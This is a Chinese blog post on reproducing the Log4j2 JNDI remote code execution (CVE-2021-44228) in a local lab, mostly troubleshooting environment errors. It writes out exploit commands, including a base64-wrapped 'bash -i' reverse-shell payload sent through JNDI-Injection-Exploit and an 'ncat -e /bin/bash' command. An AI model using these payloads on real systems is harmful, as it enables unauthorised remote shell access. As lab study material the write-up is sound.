一、环境搭建
Tips: 本文出自一个Java废物,如果不对或者不足的地方欢迎大佬提出来或补充
相信很多大佬在复现的时候,多多少少都会遇到很多问题,这里将自己遇到的问题总结一下
1、推荐本地docker的方式搭建
docker pull vulfocus/log4j2-rce-2021-12-09:latest
data:image/s3,"s3://crabby-images/91bd5/91bd55b645fd7d143b1f6b4682439de0a8007805" alt="image-20211213220908079"
2、使用本地环境
推荐使用https://github.com/tangxiaofeng7/CVE-2021-44228-Apache-Log4j-Rce进行搭建,方便快捷
data:image/s3,"s3://crabby-images/8b47e/8b47e1539ca404468abbe1338d64416c954e1335" alt="image-20211214014206854"
二、GETSHELL遇到的问题
1、关于提示RFC 7230的问题
Content-Type: application/x-www-form-urlencoded
# 需要在请求头中加上Content-Type
data:image/s3,"s3://crabby-images/0b5c7/0b5c7a47dee74ec20beafc236f7a4d4e8fb962a0" alt="image-20211213222912263"
2、高版本的Macos如何安装低版本的JDK
set theDMG to choose file with prompt "Please select javaforosx.dmg:" of type {"dmg"}
do shell script "hdiutil mount " & quoted form of POSIX path of theDMG
do shell script "pkgutil --expand /Volumes/Java\\ for\\ macOS\\ 2017-001/JavaForOSX.pkg ~/tmp"
do shell script "hdiutil unmount /Volumes/Java\\ for\\ macOS\\ 2017-001/"
do shell script "sed -i '' 's/return false/return true/g' ~/tmp/Distribution"
do shell script "pkgutil --flatten ~/tmp ~/Desktop/Java.pkg"
do shell script "rm -rf ~/tmp"
display dialog "Modified Java.pkg saved on desktop" buttons {"Ok"}
然后桌面找到Java.pkg即可
data:image/s3,"s3://crabby-images/12581/125814d92a4150a6ae50f0e4e81249141cc54d36" alt="image-20211213230927521"
data:image/s3,"s3://crabby-images/8e09f/8e09f66403372387e6784ccde56b6f42e5cb1a93" alt="image-20211213230920682"
data:image/s3,"s3://crabby-images/e86bf/e86bf5a9345f4c032d01654622353a5c349eafd7" alt="image-20211213230946919"
然后安装在/Library/Java/JavaVirtualMachines/1.6.0.jdk/Contents/Home目录下,然后vim一下配置,增加快捷命令
data:image/s3,"s3://crabby-images/97207/97207a524143aa37a06c5bb2fafa89a5ac490f2e" alt="image-20211213231504597"
data:image/s3,"s3://crabby-images/4925b/4925bbe5322a6b0b9b07673cdee610f68da5a5de" alt="image-20211213231511426"
最后再source一下
data:image/s3,"s3://crabby-images/7c249/7c2494e4e8d54b6ea738fbcffb4a449f75b664b6" alt="image-20211213231534188"
这样就可以动态的切换jdk版本了
data:image/s3,"s3://crabby-images/49511/495113f2a9c7dab8bf595be67612ac973b6fa4b1" alt="image-20211213231558334"
3、关于报Reference Class Name: foo的解决办法
因为在2018年10月,Java最终也修复了这个利用点,对LDAP Reference远程工厂类的加载增加了限制11.0.1、8u191、7u201、6u211 com.sun.jndi.ldap.object.trustURLCodebase 默认为false
主要存在版本的限制
服务器上的版本太高的问题
data:image/s3,"s3://crabby-images/0041f/0041ff336367ad893051fbd7761b9fbdf4247c99" alt="image-20211214010228405"
1、方法一
需要加上以下代码即可复现
因为在2018年10月,Java最终也修复了这个利用点,对LDAP Reference远程工厂类的加载增加了限制11.0.1、8u191、7u201、6u211 com.sun.jndi.ldap.object.trustURLCodebase 默认为false
System.setProperty("com.sun.jndi.ldap.object.trustURLCodebase", "true");
data:image/s3,"s3://crabby-images/48e48/48e4864a292a20d8d342de1703ad4b2bdf8a1e5a" alt="image-20211214003459750"
2、方法二
对于这种
data:image/s3,"s3://crabby-images/9e5d4/9e5d455b54754c5c92356b2be82a09faba7dc419" alt="image-20211214012232001"
可以使用payload
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "touch /tmp/asd" -A 192.168.124.2
网上很多复现教程都没有说,在这里需要选择什么,这里需要选择rmi也就是
data:image/s3,"s3://crabby-images/fca7b/fca7b2d15c90966e1834a7208589ce6de4c59536" alt="image-20211214012335380"
随后
data:image/s3,"s3://crabby-images/15fa4/15fa4d0a9de350a03d362007535f1e748b387992" alt="image-20211214012406265"
data:image/s3,"s3://crabby-images/7911a/7911ad95a99241a08442fa8aa70c2f59ffc8b60f" alt="image-20211214012443613"
服务器上同理
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,base64}|{base64,-d}|{bash,-i}" -A xxxxx
data:image/s3,"s3://crabby-images/142a5/142a5d0d3329f49353a085311f74522c6caf30f5" alt="image-20211214013525356"
data:image/s3,"s3://crabby-images/a9b3f/a9b3f5fb635af38c288487975f3dd2fd0fef78db" alt="image-20211214013607246"
data:image/s3,"s3://crabby-images/d0e03/d0e037383206f924695936847e85833a41be910e" alt="image-20211214013639171"
data:image/s3,"s3://crabby-images/8ab64/8ab6400ec35718922115103e53ef360ff0e51b63" alt="image-20211214013706106"
4、关于MacOs下复现报错java.io.IOException: Cannot run program "ncat -e /bin/bash xxx": error=2, No such file or directory
当前JDK版本
data:image/s3,"s3://crabby-images/81e37/81e371ab9b73d10ca51af8fd4656fa697cc33341" alt="image-20211214022038787"
data:image/s3,"s3://crabby-images/137b2/137b299eafb8d9bb903ae9d89c9b1abab318962d" alt="image-20211213233918085"
这里主要是因为POC的问题,这里需要构造一个类似于字符串的一个序列一样,不能直接写完整的命令
错误的写法
data:image/s3,"s3://crabby-images/dc763/dc76355b4a07a0b8918f1a5fc800ff4853aaead7" alt="image-20211213234006452"
正确的写法
data:image/s3,"s3://crabby-images/8d33b/8d33bd8269a2c43917a72a505fba79202b76ba7a" alt="image-20211213234037607"
随后运行,成功反弹Shell
data:image/s3,"s3://crabby-images/882c2/882c2f147c12beb19c5c09fd06fb7cf5203355bb" alt="image-20211213234131387"
data:image/s3,"s3://crabby-images/84fde/84fde07ebd3c58d28cd2554160e09d7a3e29b984" alt="image-20211213234145468"
弹计算器
data:image/s3,"s3://crabby-images/5029f/5029fed645d05a1ce9db97efffef07a220ebc7a8" alt="image-20211213234510673"
三、使用的工具
https://github.com/welk1n/JNDI-Injection-Exploit
https://github.com/RandomRobbieBF/marshalsec-jar
四、参考
https://www.cnblogs.com/zpchcbd/p/14941783.html
https://www.jianshu.com/p/95dfdcfb952a
https://stackoverflow.com/questions/59409811/illegalargumentexception-the-http-header-line-does-not-conform-to-rfc-7230-when
http://www.hackdig.com/04/hack-81555.htm
https://coderedirect.com/questions/556419/cannot-run-program-error-2-no-such-file-or-directory-java
https://xz.aliyun.com/t/6633#toc-5